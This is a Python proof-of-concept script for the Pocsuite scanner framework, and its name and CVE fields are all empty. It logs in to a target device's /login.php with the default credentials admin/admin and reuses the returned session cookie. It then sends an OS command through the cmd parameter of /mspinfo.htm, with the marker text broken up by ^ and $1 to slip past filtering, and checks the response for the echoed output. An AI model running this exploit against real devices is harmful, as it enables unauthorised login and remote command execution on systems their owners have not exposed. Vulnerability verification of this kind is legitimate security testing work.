#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pocsuite.api.request import req
from pocsuite.api.poc import register,Output, POCBase
from pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url
import re

class TestPOC(POCBase):
	vulID = ''''''
	cveID = ''''''
	cnvdID = ''''''
	cnnvdID = ''''''
	version = ''''''
	author = ''''''
	vulDate = ''''''
	createDate = ''''''
	updateDate = ''''''
	name = ''''''
	desc = ''''''
	solution = ''''''
	severity = ''''''
	vulType = ''''''
	taskType = ''''''
	references = ['''''']
	appName = ''''''
	appVersion = ''''''
	appPowerLink = ''''''
	samples = ['']
	install_requires = ['''''']

	def _attack(self):
		return self._verify()

	def _verify(self):
		self.url,ip,port = parse_ip_port(self.target,80)
		result = {}
		headers = {
				"Content-Type": "application/x-www-form-urlencoded"
		}
		data = "username=admin&pwd=admin&find_username=&selquestion=0&txt_answer=&txt_newpwd=&txt_newpwdconfirm=&mode=login&lang="
		path = '/login.php'
		vul_url = make_verify_url(self.url, path, mod = 0)
		resp = req.post(vul_url, headers = headers, data = data, verify = False, allow_redirects = False, timeout = 10)
		if "window.location='patrolflow.php';" in resp.content and resp.status_code == 200:
			Cookie = re.findall(r'(.*?);', resp.headers["Set-Cookie"])[0]
			headers1 = {
					"Cookie": Cookie
			}
			path1 = '''/mspinfo.htm?flag=cmd&cmd=echo%20Test^By^ZsfTest$1By$1Zsf'''
			vulurl = make_verify_url(self.url, path1, mod = 0)
			resp1 = req.get(vulurl, headers = headers1, verify = False, allow_redirects = False, timeout = 10)
			if "TestByZsf" in resp1.content and resp1.status_code == 200:
				result['VerifyInfo'] = http_packet(resp1)
				result['VerifyInfo']['URL'] = vulurl
				result['VerifyInfo']['port'] = port
		return self.parse_output(result)

	def parse_output(self, result):
		#parse output
		output = Output(self)
		if result:
			output.success(result)
		else:
			output.fail('Internet nothing returned')
		return output


register(TestPOC)